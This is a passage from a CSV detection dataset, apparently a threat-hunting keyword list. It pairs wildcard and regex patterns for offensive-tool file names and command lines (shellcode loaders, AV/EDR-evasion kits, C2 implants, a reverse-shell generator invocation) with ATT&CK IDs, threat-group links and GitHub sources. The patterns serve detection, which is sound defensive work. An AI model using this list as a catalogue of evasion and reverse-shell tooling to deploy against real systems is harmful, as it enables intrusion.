CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/OneHone/C--Shellcode","1","1","N/A","N/A","10","10","20","2","2019-11-28T01:53:55Z","2019-11-05T09:48:14Z","59334" "*shellcode35.exe*",".{0,1000}shellcode35\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","python ShellCode Loader (Cobaltstrike&Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - 
RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/OneHone/C--Shellcode","1","1","N/A","N/A","10","10","20","2","2019-11-28T01:53:55Z","2019-11-05T09:48:14Z","59335" "*shellcode40.exe*",".{0,1000}shellcode40\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","python ShellCode Loader (Cobaltstrike&Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/OneHone/C--Shellcode","1","1","N/A","N/A","10","10","20","2","2019-11-28T01:53:55Z","2019-11-05T09:48:14Z","59336" "*shellcodeCrypter-bin.py*",".{0,1000}shellcodeCrypter\-bin\.py.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","59337" "*shellcodeCrypter-msfvenom.py*",".{0,1000}shellcodeCrypter\-msfvenom\.py.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","59338" "*Shellcode-Download_CreateThread_Execution*",".{0,1000}Shellcode\-Download_CreateThread_Execution.{0,1000}","offensive_tool_keyword","Shellcode-Downloader-CreateThread-Execution","This POC gives you the possibility to compile a .exe to completely avoid statically detection by AV/EPP/EDR of your C2-shellcode and download and execute your C2-shellcode which is hosted on your (C2)-webserver.","T1105 - T1055.001 - T1027 - T1203 - T1071","TA0005 - TA0011 - TA0002 - TA0009","N/A","N/A","Defense 
Evasion","https://github.com/VirtualAlllocEx/Shellcode-Downloader-CreateThread-Execution","1","1","N/A","N/A","N/A","3","246","51","2023-05-25T02:48:55Z","2022-03-27T07:51:08Z","59339" "*Shellcode-Downloader-CreateThread-Execution*",".{0,1000}Shellcode\-Downloader\-CreateThread\-Execution.{0,1000}","offensive_tool_keyword","Shellcode-Downloader-CreateThread-Execution","This POC gives you the possibility to compile a .exe to completely avoid statically detection by AV/EPP/EDR of your C2-shellcode and download and execute your C2-shellcode which is hosted on your (C2)-webserver.","T1105 - T1055.001 - T1027 - T1203 - T1071","TA0005 - TA0011 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Shellcode-Downloader-CreateThread-Execution","1","1","N/A","N/A","N/A","3","246","51","2023-05-25T02:48:55Z","2022-03-27T07:51:08Z","59340" "*shellcodeEncryptDecrypt*",".{0,1000}shellcodeEncryptDecrypt.{0,1000}","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","N/A","10","10","1012","160","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z","59341" "*shellcode-exec.ps1*",".{0,1000}shellcode\-exec\.ps1.{0,1000}","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1059.001 - T1209 - T1105 - T1547 - T1027","TA0003 - TA0005 - TA0002 - TA0011","N/A","N/A","Persistence","https://github.com/youhacker55/PayGen","1","1","N/A","N/A","N/A","1","4","0","2023-02-23T00:05:57Z","2021-06-16T20:20:55Z","59342" "*shellcodeexec.x32*",".{0,1000}shellcodeexec\.x32.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","1","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","59343" "*shellcodeexec.x64*",".{0,1000}shellcodeexec\.x64.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","1","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","59344" "*ShellcodeFluctuation.*",".{0,1000}ShellcodeFluctuation\..{0,1000}","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","N/A","10","10","1012","160","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z","59345" "*ShellcodeFluctuation64*",".{0,1000}ShellcodeFluctuation64.{0,1000}","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","N/A","10","10","1012","160","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z","59346" "*ShellcodeFluctuation86*",".{0,1000}ShellcodeFluctuation86.{0,1000}","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then 
encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","N/A","10","10","1012","160","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z","59347" "*Shellcode-Hide-main*",".{0,1000}Shellcode\-Hide\-main.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","59348" "*shellcodeInjection.json*",".{0,1000}shellcodeInjection\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","59349" 
"*Shellcode-Loader-master*",".{0,1000}Shellcode\-Loader\-master.{0,1000}","offensive_tool_keyword","Shellcode-Loader","dynamic shellcode loading","T1055 - T1055.012 - T1027 - T1027.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ReversingID/Shellcode-Loader","1","1","N/A","N/A","10","3","244","44","2025-01-25T16:30:56Z","2021-08-08T08:53:03Z","59350" "*ShellcodeRDI.*",".{0,1000}ShellcodeRDI\..{0,1000}","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode","T1620 - T1055.001 - T1059.004 - T1027 - T1105","TA0005 - TA0004 - TA0002","N/A","N/A","Resource Development","https://github.com/monoxgas/sRDI","1","1","N/A","N/A","N/A","10","2262","473","2023-11-15T10:53:00Z","2017-07-28T19:30:53Z","59351" "*ShellcodeRDI.py*",".{0,1000}ShellcodeRDI\.py.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","59352" "*ShellcodeRDI.py*",".{0,1000}ShellcodeRDI\.py.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","59353" "*shellcode-runner.py*",".{0,1000}shellcode\-runner\.py.{0,1000}","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1059.001 - T1209 - T1105 - T1547 - T1027","TA0003 - TA0005 - TA0002 - 
TA0011","N/A","N/A","Persistence","https://github.com/youhacker55/PayGen","1","1","N/A","N/A","N/A","1","4","0","2023-02-23T00:05:57Z","2021-06-16T20:20:55Z","59354" "*ShellcodeTemplate.x64.bin*",".{0,1000}ShellcodeTemplate\.x64\.bin.{0,1000}","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","N/A","10","1","23","3","2023-08-23T13:50:27Z","2023-12-01T12:47:43Z","59355" "*shellcodetester *",".{0,1000}shellcodetester\s.{0,1000}","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Resource Development","https://github.com/helviojunior/shellcodetester","1","0","N/A","N/A","N/A","1","92","30","2024-11-06T00:48:22Z","2019-06-11T04:39:58Z","59356" "*ShellCodeTester.csproj*",".{0,1000}ShellCodeTester\.csproj.{0,1000}","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Resource Development","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","N/A","1","92","30","2024-11-06T00:48:22Z","2019-06-11T04:39:58Z","59357" "*shellcodetester.exe*",".{0,1000}shellcodetester\.exe.{0,1000}","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Resource Development","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","N/A","1","92","30","2024-11-06T00:48:22Z","2019-06-11T04:39:58Z","59358" "*shellcodetester.git*",".{0,1000}shellcodetester\.git.{0,1000}","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - 
T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Resource Development","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","N/A","1","92","30","2024-11-06T00:48:22Z","2019-06-11T04:39:58Z","59359" "*shellcodetester.sh*",".{0,1000}shellcodetester\.sh.{0,1000}","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Resource Development","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","N/A","1","92","30","2024-11-06T00:48:22Z","2019-06-11T04:39:58Z","59360" "*ShellCodeTester.sln*",".{0,1000}ShellCodeTester\.sln.{0,1000}","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Resource Development","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","N/A","1","92","30","2024-11-06T00:48:22Z","2019-06-11T04:39:58Z","59361" "*shellerator --reverse-shell --lhost * --lport * --type *",".{0,1000}shellerator\s\-\-reverse\-shell\s\-\-lhost\s.{0,1000}\s\-\-lport\s.{0,1000}\s\-\-type\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","59362" "*ShellGen powershell.exe -ep bypass ",".{0,1000}ShellGen\spowershell\.exe\s\-ep\sbypass\s","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black 
Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","59363" "*ShellGen -x64 -B64PwshCommand *",".{0,1000}ShellGen\s\-x64\s\-B64PwshCommand\s.{0,1000}","offensive_tool_keyword","ShellGen","PowerShell script to generate ShellCode in various formats","T1059.001 - T1588","TA0042","N/A","N/A","Resource Development","https://github.com/Leo4j/ShellGen","1","0","N/A","N/A","7","1","41","10","2024-09-25T09:29:13Z","2024-08-22T13:32:06Z","59364" "*ShellGen -x64 -CmdCommand *",".{0,1000}ShellGen\s\-x64\s\-CmdCommand\s.{0,1000}","offensive_tool_keyword","ShellGen","PowerShell script to generate ShellCode in various formats","T1059.001 - T1588","TA0042","N/A","N/A","Resource Development","https://github.com/Leo4j/ShellGen","1","0","N/A","N/A","7","1","41","10","2024-09-25T09:29:13Z","2024-08-22T13:32:06Z","59365" "*ShellGen -x64 -PwshCommand *",".{0,1000}ShellGen\s\-x64\s\-PwshCommand\s.{0,1000}","offensive_tool_keyword","ShellGen","PowerShell script to generate ShellCode in various formats","T1059.001 - T1588","TA0042","N/A","N/A","Resource Development","https://github.com/Leo4j/ShellGen","1","0","N/A","N/A","7","1","41","10","2024-09-25T09:29:13Z","2024-08-22T13:32:06Z","59366" "*ShellGhost.dll",".{0,1000}ShellGhost\.dll","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","N/A","10","1175","140","2023-10-16T06:40:24Z","2023-07-01T16:56:58Z","59367" "*ShellGhost.exe*",".{0,1000}ShellGhost\.exe.{0,1000}","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","N/A","10","1175","140","2023-10-16T06:40:24Z","2023-07-01T16:56:58Z","59368" "*ShellGhost.sln*",".{0,1000}ShellGhost\.sln.{0,1000}","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","N/A","10","1175","140","2023-10-16T06:40:24Z","2023-07-01T16:56:58Z","59369" "*ShellGhost.vcxproj*",".{0,1000}ShellGhost\.vcxproj.{0,1000}","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","N/A","10","1175","140","2023-10-16T06:40:24Z","2023-07-01T16:56:58Z","59370" "*ShellGhost_mapping.py*",".{0,1000}ShellGhost_mapping\.py.{0,1000}","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","N/A","10","1175","140","2023-10-16T06:40:24Z","2023-07-01T16:56:58Z","59371" "*ShellGhost-master.zip*",".{0,1000}ShellGhost\-master\.zip.{0,1000}","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","N/A","10","1175","140","2023-10-16T06:40:24Z","2023-07-01T16:56:58Z","59372" "*ShellProfilePersistence.json*",".{0,1000}ShellProfilePersistence\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also 
known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","59373" "*ShellPwnsh.exe*",".{0,1000}ShellPwnsh\.exe.{0,1000}","offensive_tool_keyword","ShellPwnsh","Reverse Shell in Golang and PowerShell Fud","T1059.001 - T1573.002 - T1105","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/BlackShell256/ShellPwnsh","1","1","N/A","N/A","9","10","9","6","2022-05-01T08:42:54Z","2022-04-28T01:26:08Z","59374" "*ShellPwnsh.go*",".{0,1000}ShellPwnsh\.go.{0,1000}","offensive_tool_keyword","ShellPwnsh","Reverse Shell in Golang and PowerShell Fud","T1059.001 - T1573.002 - T1105","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/BlackShell256/ShellPwnsh","1","1","N/A","N/A","9","10","9","6","2022-05-01T08:42:54Z","2022-04-28T01:26:08Z","59375" "*shellster/LDAPPER*",".{0,1000}shellster\/LDAPPER.{0,1000}","offensive_tool_keyword","LDAPPER","LDAP Querying without the Suck","T1087 - T1069 - T1018","TA0007","N/A","N/A","Discovery","https://github.com/shellster/LDAPPER","1","1","N/A","N/A","7","1","99","11","2024-11-09T03:53:26Z","2020-06-17T16:53:35Z","59376" "*shellter.exe*",".{0,1000}shellter\.exe.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","59377" "*shepardsbind_recv.py*",".{0,1000}shepardsbind_recv\.py.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource 
Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","59378" "*shepbind_serv.exe*",".{0,1000}shepbind_serv\.exe.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","59379" "*Sherlock.ps1*",".{0,1000}Sherlock\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","59380" "*sherlock.ps1*",".{0,1000}sherlock\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","59381" "*Sherlock_Vulns.txt*",".{0,1000}Sherlock_Vulns\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","59382" "*Shhhavoc.py 
*",".{0,1000}Shhhavoc\.py\s.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","1","N/A","N/A","9","10","1186","191","2024-05-08T20:24:35Z","2021-09-28T16:52:24Z","59383" "*Shhhloader.py*",".{0,1000}Shhhloader\.py.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","1","N/A","N/A","9","10","1186","191","2024-05-08T20:24:35Z","2021-09-28T16:52:24Z","59384" "*Shhhloader-main\*",".{0,1000}Shhhloader\-main\\.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense 